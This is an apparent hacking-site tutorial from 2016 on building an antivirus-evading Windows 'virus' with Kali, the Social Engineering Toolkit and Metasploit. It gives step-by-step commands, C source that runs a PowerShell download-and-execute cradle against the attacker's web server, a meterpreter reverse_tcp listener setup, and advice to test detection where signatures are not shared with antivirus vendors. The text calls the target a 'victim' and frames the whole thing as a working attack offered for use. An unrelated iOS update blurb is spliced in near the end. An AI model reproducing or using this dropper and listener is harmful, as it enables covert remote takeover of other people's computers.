How to Bypass Antivirus Using Powershell and Metasploit (Kali Tutorial)

Jan 6, 2016 11:40 PM
Jan 7, 2016 12:06 AM
635876914337328599.jpg

So you want to create a meterpreter virus, but you keep getting caught by AV. How do you create one that will go undetected? In this tutorial, I'll teach you how to code your own simple virus that will download a powershell payload from an apache webserver and execute it - bypassing antivirus.

Things You'll Need:

  1. Kali Linux
  2. A 'C' Compiler (I use gcc on Windows, I can't seem to get the kali version working)
  3. The Social Engineering Toolkit (preinstalled on kali)
  4. An Apache Webserver (preinstalled on kali)
  5. The Metasploit Framework (also preinstalled on kali)

Step 1: Creating the Powershell Payload

We'll be using the Social Engineering Toolkit to create our powershell payload. To open it, type this in console:

setoolkit

635876869260297007.jpg

From there, type 1 for "social engineering attacks", then 9 for "powershell attack vectors", and finally 1 for "powershell alphanumeric shellcode injector".

Now, you'll need to provide an "LHOST". If you didn't already know, this is your attacker machine's local IP adress (so long as you're attacking over a local area network). To determine it, open a new terminal window and type in:

ifconfig

635876874845767674.jpg

Scroll up to the top to find the interface that's connected to your network (in my case, that's "eth0"). Find what I've highlighted, "inet", and next to it you'll find your local IP adress (in my case, it's 10.0.0.13). This is what you'll input for your LHOST.

Next, it'll prompt you to type in a "port for the reverse". It's referring to the "LPORT". Usually, I use "4444" as it's a meterpreter convention, but you can use any port you want so long as you remember it.

Then it will prompt you if you want to "start the listener now". Type "no", we'll do this manually later. For now we're done with SET.

Now we'll need to move that payload over to our apache webserver. To do so, open a terminal and type:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt

However, if you're still using Kali Linux 1 (not 2), use this command:

mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/payload.txt

This is because, in Kali Linux version 2, the apache root directory was moved to the "html" folder inside of /var/www/.

Now, simply type:

service apache2 start

...and your webserver should be started.

Step 2: Creating the Virus

To create the virus, I'm using windows notepad and MinGW's "gcc". The code for the virus is as follows:

#include

main()

{

system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))\"");

return 0;

}

Remember to change "10.0.0.13", as your LHOST (or local IP address) will likely be different.

Save this as "evil.c", then compile it using your favorite c compiler. In my case, I'm using gcc so I type:

gcc.exe D:\Hacking\evil.c -o D:\Hacking\evil.exe

635876895630453412.jpg

Now we have our FUD ("fully undetectable") executable.

Step 3: Setting Up the Listener

Lastly, we need to set up a listener to wait for a meterpreter session. Fire up the metasploit framework by typing:

msfconsole

Once it loads, type:

use multi/handler

635876900500766019.jpg

Now, you'll need to type a series of options so I'll list them out for you:

  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST 10.0.0.13
  • set LPORT 4444

Again, remember to change LHOST to your local IP address, and change LPORT if you used something other than 4444.

Finally, type "exploit" and hit enter to start the listener. As soon as your victim runs the "evil.exe" virus, you'll get a session.

635876907841703409.jpg

That's it!

If you want to check your executable against antiviruses, I recommend against using VirusTotal. This is because they submit their signatures to antivirus companies - increasing the likelihood of your executable being detected. Instead, personally I use nodistribute.com because, if they're keeping to their word, the signatures aren't being submitted. Here are the results of my executable if you're interested:

635876914337328599.jpg

P.S.

I hope you found my post useful and easy to follow. As this is my first post here (or anywhere, for that matter), I would really appreciate any feedback on what I could do better. Anyways, thanks for reading my post, and good luck!

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Comments

No Comments Exist

Be the first, drop a comment!